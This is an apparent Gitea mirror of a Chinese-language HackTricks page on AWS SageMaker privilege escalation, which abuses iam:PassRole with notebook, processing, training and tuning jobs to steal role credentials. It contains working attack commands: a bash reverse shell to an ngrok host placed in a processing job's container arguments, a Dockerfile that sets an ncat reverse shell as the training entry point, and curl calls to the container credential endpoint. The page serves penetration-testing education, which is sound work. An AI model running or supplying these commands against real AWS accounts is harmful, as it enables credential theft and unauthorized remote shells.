gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-26 11:14:40 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
a74dc599e01c0c9dbfbf97f405c7dfe7b7f46642
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md

107 lines
5.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# AWS - Sagemaker Privesc
{{#include ../../../banners/hacktricks-training.md}}
## AWS - Sagemaker Privesc
### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
开始创建一个与其关联的 IAM 角色访问的笔记本:
```bash
aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
```
响应应包含一个 `NotebookInstanceArn` 字段,该字段将包含新创建的笔记本实例的 ARN。然后我们可以使用 `create-presigned-notebook-instance-url` API 生成一个 URL以便在笔记本实例准备好后访问它
```bash
aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>
```
导航到 URL 并在浏览器中点击右上角的 \`Open JupyterLab\`然后向下滚动到“Launcher”选项卡在“Other”部分点击“Terminal”按钮。
现在可以访问 IAM 角色的元数据凭证。
**潜在影响:** 提升到指定的 sagemaker 服务角色。
### `sagemaker:CreatePresignedNotebookInstanceUrl`
如果已经在上面运行 Jupyter **notebooks**,并且您可以通过 `sagemaker:ListNotebookInstances` 列出它们(或以其他方式发现它们)。您可以 **为它们生成一个 URL访问它们并窃取凭证如前面所述的技术所示**
```bash
aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>
```
**潜在影响:** 提升到附加的 sagemaker 服务角色。
### `sagemaker:CreateProcessingJob,iam:PassRole`
拥有这些权限的攻击者可以使 **sagemaker 执行一个 processingjob**,并附加一个 sagemaker 角色。攻击者可以指定将在 **AWS 管理的 ECS 账户实例** 中运行的容器的定义,并 **窃取附加的 IAM 角色的凭证**
```bash
# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>
# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds
```
**潜在影响:** 提升到指定的 sagemaker 服务角色。
### `sagemaker:CreateTrainingJob`, `iam:PassRole`
拥有这些权限的攻击者将能够创建一个训练作业,**在其上运行任意容器**,并附加一个**角色**。因此,攻击者将能够窃取该角色的凭证。
> [!WARNING]
> 这个场景比之前的更难以利用,因为你需要生成一个 Docker 镜像,该镜像将直接将反向 shell 或凭证发送给攻击者(你无法在训练作业的配置中指定启动命令)。
>
> ```bash
> # 创建 docker 镜像
> mkdir /tmp/rev
> ## 注意训练作业将调用一个名为 "train" 的可执行文件
> ## 这就是我将反向 shell 放在 /bin/train 的原因
> ## 设置 <YOUR-IP-OR-DOMAIN> 和 <YOUR-PORT> 的值
> cat > /tmp/rev/Dockerfile <<EOF
> FROM ubuntu
> RUN apt update && apt install -y ncat curl
> RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
> RUN chmod +x /bin/train
> CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
> EOF
>
> cd /tmp/rev
> sudo docker build . -t reverseshell
>
> # 上传到 ECR
> sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
> sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
> sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
> ```
```bash
# Create trainning job with the docker image created
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'
#To get the creds
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
```
**潜在影响:** 提升到指定的 sagemaker 服务角色。
### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
拥有这些权限的攻击者将(可能)能够创建一个 **超参数训练作业****在其上运行任意容器**,并附加一个 **角色**。\
_我还没有利用这个漏洞,因为时间不够,但看起来与之前的漏洞类似,欢迎提交 PR 以提供利用细节。_
## 参考
- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
{{#include ../../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink